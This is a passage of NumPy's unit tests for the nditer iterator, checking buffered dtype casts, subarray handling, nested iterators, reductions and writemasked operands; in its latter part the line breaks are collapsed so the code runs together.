    sdt = [('a', 'f4'), ('b', 'i8'), ('c', 'c8', (2, 3)), ('d', 'O')]
    a = np.zeros((3,), dtype='O')
    a[0] = (0.5, 0.5, [[0.5, 0.5, 0.5], [0.5, 0.5, 0.5]], 0.5)
    a[1] = (1.5, 1.5, [[1.5, 1.5, 1.5], [1.5, 1.5, 1.5]], 1.5)
    a[2] = (2.5, 2.5, [[2.5, 2.5, 2.5], [2.5, 2.5, 2.5]], 2.5)
    rc = sys.getrefcount(a[0])
    i = nditer(a, ['buffered', 'refs_ok'], ['readonly'],
               casting='unsafe',
               op_dtypes=sdt)
    vals = [x.copy() for x in i]
    assert_equal(vals[0]['a'], 0.5)
    assert_equal(vals[0]['b'], 0)
    assert_equal(vals[0]['c'], [[(0.5)]*3]*2)
    assert_equal(vals[0]['d'], 0.5)
    assert_equal(vals[1]['a'], 1.5)
    assert_equal(vals[1]['b'], 1)
    assert_equal(vals[1]['c'], [[(1.5)]*3]*2)
    assert_equal(vals[1]['d'], 1.5)
    assert_equal(vals[0].dtype, np.dtype(sdt))
    vals, i, x = [None]*3
    assert_equal(sys.getrefcount(a[0]), rc)

    # struct type -> simple (takes the first value)
    sdt = [('a', 'f4'), ('b', 'i8'), ('d', 'O')]
    a = np.array([(5.5, 7, 'test'), (8, 10, 11)], dtype=sdt)
    i = nditer(a, ['buffered', 'refs_ok'], ['readonly'],
               casting='unsafe',
               op_dtypes='i4')
    assert_equal([x_[()] for x_ in i], [5, 8])

    # struct type -> struct type (field-wise copy)
    sdt1 = [('a', 'f4'), ('b', 'i8'), ('d', 'O')]
    sdt2 = [('d', 'u2'), ('a', 'O'), ('b', 'f8')]
    a = np.array([(1, 2, 3), (4, 5, 6)], dtype=sdt1)
    i = nditer(a, ['buffered', 'refs_ok'], ['readonly'],
               casting='unsafe',
               op_dtypes=sdt2)
    assert_equal(i[0].dtype, np.dtype(sdt2))
    assert_equal([np.array(x_) for x_ in i],
                 [np.array((3, 1, 2), dtype=sdt2),
                  np.array((6, 4, 5), dtype=sdt2)])

    # struct type -> struct type (field gets discarded)
    sdt1 = [('a', 'f4'), ('b', 'i8'), ('d', 'O')]
    sdt2 = [('b', 'O'), ('a', 'f8')]
    a = np.array([(1, 2, 3), (4, 5, 6)], dtype=sdt1)
    i = nditer(a, ['buffered', 'refs_ok'], ['readwrite'],
               casting='unsafe',
               op_dtypes=sdt2)
    assert_equal(i[0].dtype, np.dtype(sdt2))
    vals = []
    for x in i:
        vals.append(np.array(x))
        x['a'] = x['b']+3
    assert_equal(vals, [np.array((2, 1), dtype=sdt2),
                        np.array((5, 4), dtype=sdt2)])
    assert_equal(a, np.array([(5, 2, None), (8, 5, None)], dtype=sdt1))

    # struct type -> struct type (structured field gets discarded)
    sdt1 = [('a', 'f4'), ('b', 'i8'), ('d', [('a', 'i2'), ('b', 'i4')])]
    sdt2 = [('b', 'O'), ('a', 'f8')]
    a = np.array([(1, 2, (0, 9)), (4, 5, (20, 21))], dtype=sdt1)
    i = nditer(a, ['buffered', 'refs_ok'], ['readwrite'],
               casting='unsafe',
               op_dtypes=sdt2)
    assert_equal(i[0].dtype, np.dtype(sdt2))
    vals = []
    for x in i:
        vals.append(np.array(x))
        x['a'] = x['b']+3
    assert_equal(vals, [np.array((2, 1), dtype=sdt2),
                        np.array((5, 4), dtype=sdt2)])
    assert_equal(a, np.array([(5, 2, (0, 0)), (8, 5, (0, 0))], dtype=sdt1))

    # struct type -> struct type (structured field w/ ref gets discarded)
    sdt1 = [('a', 'f4'), ('b', 'i8'), ('d', [('a', 'i2'), ('b', 'O')])]
    sdt2 = [('b', 'O'), ('a', 'f8')]
    a = np.array([(1, 2, (0, 9)), (4, 5, (20, 21))], dtype=sdt1)
    i = nditer(a, ['buffered', 'refs_ok'], ['readwrite'],
               casting='unsafe',
               op_dtypes=sdt2)
    assert_equal(i[0].dtype, np.dtype(sdt2))
    # (continuation of test_iter_buffered_cast_structured_type from above)
    vals = []
    for x in i:
        vals.append(np.array(x))
        x['a'] = x['b']+3
    assert_equal(vals, [np.array((2, 1), dtype=sdt2),
                        np.array((5, 4), dtype=sdt2)])
    assert_equal(a, np.array([(5, 2, (0, None)), (8, 5, (0, None))],
                             dtype=sdt1))

    # struct type -> struct type back (structured field w/ ref gets discarded)
    sdt1 = [('b', 'O'), ('a', 'f8')]
    sdt2 = [('a', 'f4'), ('b', 'i8'), ('d', [('a', 'i2'), ('b', 'O')])]
    a = np.array([(1, 2), (4, 5)], dtype=sdt1)
    i = nditer(a, ['buffered', 'refs_ok'], ['readwrite'],
               casting='unsafe',
               op_dtypes=sdt2)
    assert_equal(i[0].dtype, np.dtype(sdt2))
    vals = []
    for x in i:
        vals.append(np.array(x))
        assert_equal(x['d'], np.array((0, None),
                                      dtype=[('a', 'i2'), ('b', 'O')]))
        x['a'] = x['b']+3
    assert_equal(vals, [np.array((2, 1, (0, None)), dtype=sdt2),
                        np.array((5, 4, (0, None)), dtype=sdt2)])
    assert_equal(a, np.array([(1, 4), (4, 7)], dtype=sdt1))

def test_iter_buffered_cast_subarray():
    """Buffered casts between subarray fields of differing shapes."""
    # Tests buffering of subarrays

    # one element -> many (copies it to all)
    sdt1 = [('a', 'f4')]
    sdt2 = [('a', 'f8', (3, 2, 2))]
    a = np.zeros((6,), dtype=sdt1)
    a['a'] = np.arange(6)
    i = nditer(a, ['buffered', 'refs_ok'], ['readonly'],
               casting='unsafe',
               op_dtypes=sdt2)
    assert_equal(i[0].dtype, np.dtype(sdt2))
    for x, count in zip(i, list(range(6))):
        assert_(np.all(x['a'] == count))

    # one element -> many -> back (copies it to all)
    sdt1 = [('a', 'O', (1, 1))]
    sdt2 = [('a', 'O', (3, 2, 2))]
    a = np.zeros((6,), dtype=sdt1)
    a['a'][:, 0, 0] = np.arange(6)
    i = nditer(a, ['buffered', 'refs_ok'], ['readwrite'],
               casting='unsafe',
               op_dtypes=sdt2)
    assert_equal(i[0].dtype, np.dtype(sdt2))
    count = 0
    for x in i:
        assert_(np.all(x['a'] == count))
        x['a'][0] += 2
        count += 1
    assert_equal(a['a'], np.arange(6).reshape(6, 1, 1)+2)

    # many -> one element -> back (copies just element 0)
    sdt1 = [('a', 'O', (3, 2, 2))]
    sdt2 = [('a', 'O', (1,))]
    a = np.zeros((6,), dtype=sdt1)
    a['a'][:, 0, 0, 0] = np.arange(6)
    i = nditer(a, ['buffered', 'refs_ok'], ['readwrite'],
               casting='unsafe',
               op_dtypes=sdt2)
    assert_equal(i[0].dtype, np.dtype(sdt2))
    count = 0
    for x in i:
        assert_equal(x['a'], count)
        x['a'] += 2
        count += 1
    assert_equal(a['a'],
                 np.arange(6).reshape(6, 1, 1, 1)*np.ones((1, 3, 2, 2))+2)

    # many -> one element -> back (copies just element 0)
    sdt1 = [('a', 'f8', (3, 2, 2))]
    sdt2 = [('a', 'O', (1,))]
    a = np.zeros((6,), dtype=sdt1)
    a['a'][:, 0, 0, 0] = np.arange(6)
    i = nditer(a, ['buffered', 'refs_ok'], ['readonly'],
               casting='unsafe',
               op_dtypes=sdt2)
    assert_equal(i[0].dtype, np.dtype(sdt2))
    count = 0
    for x in i:
        assert_equal(x['a'], count)
        count += 1

    # many -> one element (copies just element 0)
    sdt1 = [('a', 'O', (3, 2, 2))]
    sdt2 = [('a', 'f4', (1,))]
    a = np.zeros((6,), dtype=sdt1)
    a['a'][:, 0, 0, 0] = np.arange(6)
    i = nditer(a, ['buffered', 'refs_ok'], ['readonly'],
               casting='unsafe',
               op_dtypes=sdt2)
    assert_equal(i[0].dtype, np.dtype(sdt2))
    count = 0
    for x in i:
        assert_equal(x['a'], count)
        count += 1

    # many -> matching shape (straightforward copy)
    sdt1 = [('a', 'O', (3, 2, 2))]
    sdt2 = [('a', 'f4', (3, 2, 2))]
    a = np.zeros((6,), dtype=sdt1)
    a['a'] = np.arange(6*3*2*2).reshape(6, 3, 2, 2)
    i = nditer(a, ['buffered', 'refs_ok'], ['readonly'],
               casting='unsafe',
               op_dtypes=sdt2)
    assert_equal(i[0].dtype, np.dtype(sdt2))
    count = 0
    for x in i:
        assert_equal(x['a'], a[count]['a'])
        count += 1

    # vector -> smaller vector (truncates)
    sdt1 = [('a', 'f8', (6,))]
    sdt2 = [('a', 'f4', (2,))]
    a = np.zeros((6,), dtype=sdt1)
    a['a'] = np.arange(6*6).reshape(6, 6)
    i = nditer(a, ['buffered', 'refs_ok'], ['readonly'],
               casting='unsafe',
               op_dtypes=sdt2)
    assert_equal(i[0].dtype, np.dtype(sdt2))
    count = 0
    for x in i:
        assert_equal(x['a'], a[count]['a'][:2])
        count += 1

    # vector -> bigger vector (pads with zeros)
    sdt1 = [('a', 'f8', (2,))]
    sdt2 = [('a', 'f4', (6,))]
    a = np.zeros((6,), dtype=sdt1)
    a['a'] = np.arange(6*2).reshape(6, 2)
    i = nditer(a, ['buffered', 'refs_ok'], ['readonly'],
               casting='unsafe',
               op_dtypes=sdt2)
    assert_equal(i[0].dtype, np.dtype(sdt2))
    count = 0
    for x in i:
        assert_equal(x['a'][:2], a[count]['a'])
        assert_equal(x['a'][2:], [0, 0, 0, 0])
        count += 1

    # vector -> matrix (broadcasts)
    sdt1 = [('a', 'f8', (2,))]
    sdt2 = [('a', 'f4', (2, 2))]
    a = np.zeros((6,), dtype=sdt1)
    a['a'] = np.arange(6*2).reshape(6, 2)
    i = nditer(a, ['buffered', 'refs_ok'], ['readonly'],
               casting='unsafe',
               op_dtypes=sdt2)
    assert_equal(i[0].dtype, np.dtype(sdt2))
    count = 0
    for x in i:
        assert_equal(x['a'][0], a[count]['a'])
        assert_equal(x['a'][1], a[count]['a'])
        count += 1

    # vector -> matrix (broadcasts and zero-pads)
    sdt1 = [('a', 'f8', (2, 1))]
    sdt2 = [('a', 'f4', (3, 2))]
    a = np.zeros((6,), dtype=sdt1)
    a['a'] = np.arange(6*2).reshape(6, 2, 1)
    i = nditer(a, ['buffered', 'refs_ok'], ['readonly'],
               casting='unsafe',
               op_dtypes=sdt2)
    assert_equal(i[0].dtype, np.dtype(sdt2))
    count = 0
    for x in i:
        assert_equal(x['a'][:2, 0], a[count]['a'][:, 0])
        assert_equal(x['a'][:2, 1], a[count]['a'][:, 0])
        assert_equal(x['a'][2,:], [0, 0])
        count += 1

    # matrix -> matrix (truncates and zero-pads)
    sdt1 = [('a', 'f8', (2, 3))]
    sdt2 = [('a', 'f4', (3, 2))]
    a = np.zeros((6,), dtype=sdt1)
    a['a'] = np.arange(6*2*3).reshape(6, 2, 3)
    i = nditer(a, ['buffered', 'refs_ok'], ['readonly'],
               casting='unsafe',
               op_dtypes=sdt2)
    assert_equal(i[0].dtype, np.dtype(sdt2))
    count = 0
    for x in i:
        assert_equal(x['a'][:2, 0], a[count]['a'][:, 0])
        assert_equal(x['a'][:2, 1], a[count]['a'][:, 1])
        assert_equal(x['a'][2,:], [0, 0])
        count += 1

def test_iter_buffering_badwriteback():
    """Write buffering must reject broadcast operands (continues past
    this chunk — the tail of this test lies beyond the visible source)."""
    # Writing back from a buffer cannot combine elements
    # a needs write buffering, but had a broadcast dimension
    a = np.arange(6).reshape(2, 3, 1)
    b = np.arange(12).reshape(2, 3, 2)
    assert_raises(ValueError, nditer, [a, b],
                  ['buffered', 'external_loop'],
                  [['readwrite'], ['writeonly']],
                  order='C')

    # But if a is readonly, it's fine
    nditer([a, b], ['buffered', 'external_loop'],
           [['readonly'], ['writeonly']],
           order='C')

    # If a has just one element, it's fine too (constant 0 stride, a reduction)
    a = np.arange(1).reshape(1, 1, 1)
nditer([a, b], ['buffered', 'external_loop', 'reduce_ok'], [['readwrite'], ['writeonly']], order='C') # check that it fails on other dimensions too a = np.arange(6).reshape(1, 3, 2) assert_raises(ValueError, nditer, [a, b], ['buffered', 'external_loop'], [['readwrite'], ['writeonly']], order='C') a = np.arange(4).reshape(2, 1, 2) assert_raises(ValueError, nditer, [a, b], ['buffered', 'external_loop'], [['readwrite'], ['writeonly']], order='C') def test_iter_buffering_string(): # Safe casting disallows shrinking strings a = np.array(['abc', 'a', 'abcd'], dtype=np.bytes_) assert_equal(a.dtype, np.dtype('S4')) assert_raises(TypeError, nditer, a, ['buffered'], ['readonly'], op_dtypes='S2') i = nditer(a, ['buffered'], ['readonly'], op_dtypes='S6') assert_equal(i[0], asbytes('abc')) assert_equal(i[0].dtype, np.dtype('S6')) a = np.array(['abc', 'a', 'abcd'], dtype=np.unicode) assert_equal(a.dtype, np.dtype('U4')) assert_raises(TypeError, nditer, a, ['buffered'], ['readonly'], op_dtypes='U2') i = nditer(a, ['buffered'], ['readonly'], op_dtypes='U6') assert_equal(i[0], sixu('abc')) assert_equal(i[0].dtype, np.dtype('U6')) def test_iter_buffering_growinner(): # Test that the inner loop grows when no buffering is needed a = np.arange(30) i = nditer(a, ['buffered', 'growinner', 'external_loop'], buffersize=5) # Should end up with just one inner loop here assert_equal(i[0].size, a.size) @dec.slow def test_iter_buffered_reduce_reuse(): # large enough array for all views, including negative strides. 
a = np.arange(2*3**5)[3**5:3**5+1] flags = ['buffered', 'delay_bufalloc', 'multi_index', 'reduce_ok', 'refs_ok'] op_flags = [('readonly',), ('readwrite', 'allocate')] op_axes_list = [[(0, 1, 2), (0, 1, -1)], [(0, 1, 2), (0, -1, -1)]] # wrong dtype to force buffering op_dtypes = [np.float, a.dtype] def get_params(): for xs in range(-3**2, 3**2 + 1): for ys in range(xs, 3**2 + 1): for op_axes in op_axes_list: # last stride is reduced and because of that not # important for this test, as it is the inner stride. strides = (xs * a.itemsize, ys * a.itemsize, a.itemsize) arr = np.lib.stride_tricks.as_strided(a, (3, 3, 3), strides) for skip in [0, 1]: yield arr, op_axes, skip for arr, op_axes, skip in get_params(): nditer2 = np.nditer([arr.copy(), None], op_axes=op_axes, flags=flags, op_flags=op_flags, op_dtypes=op_dtypes) nditer2.operands[-1][...] = 0 nditer2.reset() nditer2.iterindex = skip for (a2_in, b2_in) in nditer2: b2_in += a2_in.astype(np.int_) comp_res = nditer2.operands[-1] for bufsize in range(0, 3**3): nditer1 = np.nditer([arr, None], op_axes=op_axes, flags=flags, op_flags=op_flags, buffersize=bufsize, op_dtypes=op_dtypes) nditer1.operands[-1][...] 
= 0 nditer1.reset() nditer1.iterindex = skip for (a1_in, b1_in) in nditer1: b1_in += a1_in.astype(np.int_) res = nditer1.operands[-1] assert_array_equal(res, comp_res) def test_iter_no_broadcast(): # Test that the no_broadcast flag works a = np.arange(24).reshape(2, 3, 4) b = np.arange(6).reshape(2, 3, 1) c = np.arange(12).reshape(3, 4) nditer([a, b, c], [], [['readonly', 'no_broadcast'], ['readonly'], ['readonly']]) assert_raises(ValueError, nditer, [a, b, c], [], [['readonly'], ['readonly', 'no_broadcast'], ['readonly']]) assert_raises(ValueError, nditer, [a, b, c], [], [['readonly'], ['readonly'], ['readonly', 'no_broadcast']]) def test_iter_nested_iters_basic(): # Test nested iteration basic usage a = arange(12).reshape(2, 3, 2) i, j = np.nested_iters(a, [[0], [1, 2]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 1, 2, 3, 4, 5], [6, 7, 8, 9, 10, 11]]) i, j = np.nested_iters(a, [[0, 1], [2]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10, 11]]) i, j = np.nested_iters(a, [[0, 2], [1]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 2, 4], [1, 3, 5], [6, 8, 10], [7, 9, 11]]) def test_iter_nested_iters_reorder(): # Test nested iteration basic usage a = arange(12).reshape(2, 3, 2) # In 'K' order (default), it gets reordered i, j = np.nested_iters(a, [[0], [2, 1]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 1, 2, 3, 4, 5], [6, 7, 8, 9, 10, 11]]) i, j = np.nested_iters(a, [[1, 0], [2]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10, 11]]) i, j = np.nested_iters(a, [[2, 0], [1]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 2, 4], [1, 3, 5], [6, 8, 10], [7, 9, 11]]) # In 'C' order, it doesn't i, j = np.nested_iters(a, [[0], [2, 1]], order='C') vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 2, 4, 
1, 3, 5], [6, 8, 10, 7, 9, 11]]) i, j = np.nested_iters(a, [[1, 0], [2]], order='C') vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 1], [6, 7], [2, 3], [8, 9], [4, 5], [10, 11]]) i, j = np.nested_iters(a, [[2, 0], [1]], order='C') vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 2, 4], [6, 8, 10], [1, 3, 5], [7, 9, 11]]) def test_iter_nested_iters_flip_axes(): # Test nested iteration with negative axes a = arange(12).reshape(2, 3, 2)[::-1, ::-1, ::-1] # In 'K' order (default), the axes all get flipped i, j = np.nested_iters(a, [[0], [1, 2]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 1, 2, 3, 4, 5], [6, 7, 8, 9, 10, 11]]) i, j = np.nested_iters(a, [[0, 1], [2]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10, 11]]) i, j = np.nested_iters(a, [[0, 2], [1]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 2, 4], [1, 3, 5], [6, 8, 10], [7, 9, 11]]) # In 'C' order, flipping axes is disabled i, j = np.nested_iters(a, [[0], [1, 2]], order='C') vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[11, 10, 9, 8, 7, 6], [5, 4, 3, 2, 1, 0]]) i, j = np.nested_iters(a, [[0, 1], [2]], order='C') vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[11, 10], [9, 8], [7, 6], [5, 4], [3, 2], [1, 0]]) i, j = np.nested_iters(a, [[0, 2], [1]], order='C') vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[11, 9, 7], [10, 8, 6], [5, 3, 1], [4, 2, 0]]) def test_iter_nested_iters_broadcast(): # Test nested iteration with broadcasting a = arange(2).reshape(2, 1) b = arange(3).reshape(1, 3) i, j = np.nested_iters([a, b], [[0], [1]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[[0, 0], [0, 1], [0, 2]], [[1, 0], [1, 1], [1, 2]]]) i, j = np.nested_iters([a, b], [[1], [0]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, 
[[[0, 0], [1, 0]], [[0, 1], [1, 1]], [[0, 2], [1, 2]]]) def test_iter_nested_iters_dtype_copy(): # Test nested iteration with a copy to change dtype # copy a = arange(6, dtype='i4').reshape(2, 3) i, j = np.nested_iters(a, [[0], [1]], op_flags=['readonly', 'copy'], op_dtypes='f8') assert_equal(j[0].dtype, np.dtype('f8')) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 1, 2], [3, 4, 5]]) vals = None # updateifcopy a = arange(6, dtype='f4').reshape(2, 3) i, j = np.nested_iters(a, [[0], [1]], op_flags=['readwrite', 'updateifcopy'], casting='same_kind', op_dtypes='f8') assert_equal(j[0].dtype, np.dtype('f8')) for x in i: for y in j: y[...] += 1 assert_equal(a, [[0, 1, 2], [3, 4, 5]]) i, j, x, y = (None,)*4 # force the updateifcopy assert_equal(a, [[1, 2, 3], [4, 5, 6]]) def test_iter_nested_iters_dtype_buffered(): # Test nested iteration with buffering to change dtype a = arange(6, dtype='f4').reshape(2, 3) i, j = np.nested_iters(a, [[0], [1]], flags=['buffered'], op_flags=['readwrite'], casting='same_kind', op_dtypes='f8') assert_equal(j[0].dtype, np.dtype('f8')) for x in i: for y in j: y[...] += 1 assert_equal(a, [[1, 2, 3], [4, 5, 6]]) def test_iter_reduction_error(): a = np.arange(6) assert_raises(ValueError, nditer, [a, None], [], [['readonly'], ['readwrite', 'allocate']], op_axes=[[0], [-1]]) a = np.arange(6).reshape(2, 3) assert_raises(ValueError, nditer, [a, None], ['external_loop'], [['readonly'], ['readwrite', 'allocate']], op_axes=[[0, 1], [-1, -1]]) def test_iter_reduction(): # Test doing reductions with the iterator a = np.arange(6) i = nditer([a, None], ['reduce_ok'], [['readonly'], ['readwrite', 'allocate']], op_axes=[[0], [-1]]) # Need to initialize the output operand to the addition unit i.operands[1][...] = 0 # Do the reduction for x, y in i: y[...] 
+= x # Since no axes were specified, should have allocated a scalar assert_equal(i.operands[1].ndim, 0) assert_equal(i.operands[1], np.sum(a)) a = np.arange(6).reshape(2, 3) i = nditer([a, None], ['reduce_ok', 'external_loop'], [['readonly'], ['readwrite', 'allocate']], op_axes=[[0, 1], [-1, -1]]) # Need to initialize the output operand to the addition unit i.operands[1][...] = 0 # Reduction shape/strides for the output assert_equal(i[1].shape, (6,)) assert_equal(i[1].strides, (0,)) # Do the reduction for x, y in i: y[...] += x # Since no axes were specified, should have allocated a scalar assert_equal(i.operands[1].ndim, 0) assert_equal(i.operands[1], np.sum(a)) # This is a tricky reduction case for the buffering double loop # to handle a = np.ones((2, 3, 5)) it1 = nditer([a, None], ['reduce_ok', 'external_loop'], [['readonly'], ['readwrite', 'allocate']], op_axes=[None, [0, -1, 1]]) it2 = nditer([a, None], ['reduce_ok', 'external_loop', 'buffered', 'delay_bufalloc'], [['readonly'], ['readwrite', 'allocate']], op_axes=[None, [0, -1, 1]], buffersize=10) it1.operands[1].fill(0) it2.operands[1].fill(0) it2.reset() for x in it1: x[1][...] += x[0] for x in it2: x[1][...] += x[0] assert_equal(it1.operands[1], it2.operands[1]) assert_equal(it2.operands[1].sum(), a.size) def test_iter_buffering_reduction(): # Test doing buffered reductions with the iterator a = np.arange(6) b = np.array(0., dtype='f8').byteswap().newbyteorder() i = nditer([a, b], ['reduce_ok', 'buffered'], [['readonly'], ['readwrite', 'nbo']], op_axes=[[0], [-1]]) assert_equal(i[1].dtype, np.dtype('f8')) assert_(i[1].dtype != b.dtype) # Do the reduction for x, y in i: y[...] 
+= x # Since no axes were specified, should have allocated a scalar assert_equal(b, np.sum(a)) a = np.arange(6).reshape(2, 3) b = np.array([0, 0], dtype='f8').byteswap().newbyteorder() i = nditer([a, b], ['reduce_ok', 'external_loop', 'buffered'], [['readonly'], ['readwrite', 'nbo']], op_axes=[[0, 1], [0, -1]]) # Reduction shape/strides for the output assert_equal(i[1].shape, (3,)) assert_equal(i[1].strides, (0,)) # Do the reduction for x, y in i: y[...] += x assert_equal(b, np.sum(a, axis=1)) # Iterator inner double loop was wrong on this one p = np.arange(2) + 1 it = np.nditer([p, None], ['delay_bufalloc', 'reduce_ok', 'buffered', 'external_loop'], [['readonly'], ['readwrite', 'allocate']], op_axes=[[-1, 0], [-1, -1]], itershape=(2, 2)) it.operands[1].fill(0) it.reset() assert_equal(it[0], [1, 2, 1, 2]) def test_iter_buffering_reduction_reuse_reduce_loops(): # There was a bug triggering reuse of the reduce loop inappropriately, # which caused processing to happen in unnecessarily small chunks # and overran the buffer. 
a = np.zeros((2, 7)) b = np.zeros((1, 7)) it = np.nditer([a, b], flags=['reduce_ok', 'external_loop', 'buffered'], op_flags=[['readonly'], ['readwrite']], buffersize=5) bufsizes = [] for x, y in it: bufsizes.append(x.shape[0]) assert_equal(bufsizes, [5, 2, 5, 2]) assert_equal(sum(bufsizes), a.size) def test_iter_writemasked_badinput(): a = np.zeros((2, 3)) b = np.zeros((3,)) m = np.array([[True, True, False], [False, True, False]]) m2 = np.array([True, True, False]) m3 = np.array([0, 1, 1], dtype='u1') mbad1 = np.array([0, 1, 1], dtype='i1') mbad2 = np.array([0, 1, 1], dtype='f4') # Need an 'arraymask' if any operand is 'writemasked' assert_raises(ValueError, nditer, [a, m], [], [['readwrite', 'writemasked'], ['readonly']]) # A 'writemasked' operand must not be readonly assert_raises(ValueError, nditer, [a, m], [], [['readonly', 'writemasked'], ['readonly', 'arraymask']]) # 'writemasked' and 'arraymask' may not be used together assert_raises(ValueError, nditer, [a, m], [], [['readonly'], ['readwrite', 'arraymask', 'writemasked']]) # 'arraymask' may only be specified once assert_raises(ValueError, nditer, [a, m, m2], [], [['readwrite', 'writemasked'], ['readonly', 'arraymask'], ['readonly', 'arraymask']]) # An 'arraymask' with nothing 'writemasked' also doesn't make sense assert_raises(ValueError, nditer, [a, m], [], [['readwrite'], ['readonly', 'arraymask']]) # A writemasked reduction requires a similarly smaller mask assert_raises(ValueError, nditer, [a, b, m], ['reduce_ok'], [['readonly'], ['readwrite', 'writemasked'], ['readonly', 'arraymask']]) # But this should work with a smaller/equal mask to the reduction operand np.nditer([a, b, m2], ['reduce_ok'], [['readonly'], ['readwrite', 'writemasked'], ['readonly', 'arraymask']]) # The arraymask itself cannot be a reduction assert_raises(ValueError, nditer, [a, b, m2], ['reduce_ok'], [['readonly'], ['readwrite', 'writemasked'], ['readwrite', 'arraymask']]) # A uint8 mask is ok too np.nditer([a, m3], ['buffered'], 
[['readwrite', 'writemasked'], ['readonly', 'arraymask']], op_dtypes=['f4', None], casting='same_kind') # An int8 mask isn't ok assert_raises(TypeError, np.nditer, [a, mbad1], ['buffered'], [['readwrite', 'writemasked'], ['readonly', 'arraymask']], op_dtypes=['f4', None], casting='same_kind') # A float32 mask isn't ok assert_raises(TypeError, np.nditer, [a, mbad2], ['buffered'], [['readwrite', 'writemasked'], ['readonly', 'arraymask']], op_dtypes=['f4', None], casting='same_kind') def test_iter_writemasked(): a = np.zeros((3,), dtype='f8') msk = np.array([True, True, False]) # When buffering is unused, 'writemasked' effectively does nothing. # It's up to the user of the iterator to obey the requested semantics. it = np.nditer([a, msk], [], [['readwrite', 'writemasked'], ['readonly', 'arraymask']]) for x, m in it: x[...] = 1 # Because we violated the semantics, all the values became 1 assert_equal(a, [1, 1, 1]) # Even if buffering is enabled, we still may be accessing the array # directly. it = np.nditer([a, msk], ['buffered'], [['readwrite', 'writemasked'], ['readonly', 'arraymask']]) for x, m in it: x[...] = 2.5 # Because we violated the semantics, all the values became 2.5 assert_equal(a, [2.5, 2.5, 2.5]) # If buffering will definitely happening, for instance because of # a cast, only the items selected by the mask will be copied back from # the buffer. it = np.nditer([a, msk], ['buffered'], [['readwrite', 'writemasked'], ['readonly', 'arraymask']], op_dtypes=['i8', None], casting='unsafe') for x, m in it: x[...] 
= 3 # Even though we violated the semantics, only the selected values # were copied back assert_equal(a, [3, 3, 2.5]) def test_iter_non_writable_attribute_deletion(): it = np.nditer(np.ones(2)) attr = ["value", "shape", "operands", "itviews", "has_delayed_bufalloc", "iterationneedsapi", "has_multi_index", "has_index", "dtypes", "ndim", "nop", "itersize", "finished"] for s in attr: assert_raises(AttributeError, delattr, it, s) def test_iter_writable_attribute_deletion(): it = np.nditer(np.ones(2)) attr = [ "multi_index", "index", "iterrange", "iterindex"] for s in attr: assert_raises(AttributeError, delattr, it, s) def test_iter_element_deletion(): it = np.nditer(np.ones(3)) try: del it[1] del it[1:2] except TypeError: pass except: raise AssertionError def test_iter_allocated_array_dtypes(): # If the dtype of an allocated output has a shape, the shape gets # tacked onto the end of the result. it = np.nditer(([1, 3, 20], None), op_dtypes=[None, ('i4', (2,))]) for a, b in it: b[0] = a - 1 b[1] = a + 1 assert_equal(it.operands[1], [[0, 2], [2, 4], [19, 21]]) # Make sure this works for scalars too it = np.nditer((10, 2, None), op_dtypes=[None, None, ('i4', (2, 2))]) for a, b, c in it: c[0, 0] = a - b c[0, 1] = a + b c[1, 0] = a * b c[1, 1] = a / b assert_equal(it.operands[2], [[8, 12], [20, 5]]) def test_0d_iter(): # Basic test for iteration of 0-d arrays: i = nditer([2, 3], ['multi_index'], [['readonly']]*2) assert_equal(i.ndim, 0) assert_equal(next(i), (2, 3)) assert_equal(i.multi_index, ()) assert_equal(i.iterindex, 0) assert_raises(StopIteration, next, i) # test reset: i.reset() assert_equal(next(i), (2, 3)) assert_raises(StopIteration, next, i) # test forcing to 0-d i = nditer(np.arange(5), ['multi_index'], [['readonly']], op_axes=[()]) assert_equal(i.ndim, 0) assert_equal(len(i), 1) # note that itershape=(), still behaves like None due to the conversions # Test a more complex buffered casting case (same as another test above) sdt = [('a', 'f4'), ('b', 'i8'), ('c', 
'c8', (2, 3)), ('d', 'O')] a = np.array(0.5, dtype='f4') i = nditer(a, ['buffered', 'refs_ok'], ['readonly'], casting='unsafe', op_dtypes=sdt) vals = next(i) assert_equal(vals['a'], 0.5) assert_equal(vals['b'], 0) assert_equal(vals['c'], [[(0.5)]*3]*2) assert_equal(vals['d'], 0.5) def test_0d_nested_iter(): a = np.arange(12).reshape(2, 3, 2) i, j = np.nested_iters(a, [[], [1, 0, 2]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]]) i, j = np.nested_iters(a, [[1, 0, 2], []]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0], [1], [2], [3], [4], [5], [6], [7], [8], [9], [10], [11]]) i, j, k = np.nested_iters(a, [[2, 0], [], [1]]) vals = [] for x in i: for y in j: vals.append([z for z in k]) assert_equal(vals, [[0, 2, 4], [1, 3, 5], [6, 8, 10], [7, 9, 11]]) def test_iter_too_large(): # The total size of the iterator must not exceed the maximum intp due # to broadcasting. Dividing by 1024 will keep it small enough to # give a legal array. size = np.iinfo(np.intp).max // 1024 arr = np.lib.stride_tricks.as_strided(np.zeros(1), (size,), (0,)) assert_raises(ValueError, nditer, (arr, arr[:, None])) # test the same for multiindex. That may get more interesting when # removing 0 dimensional axis is allowed (since an iterator can grow then) assert_raises(ValueError, nditer, (arr, arr[:, None]), flags=['multi_index']) 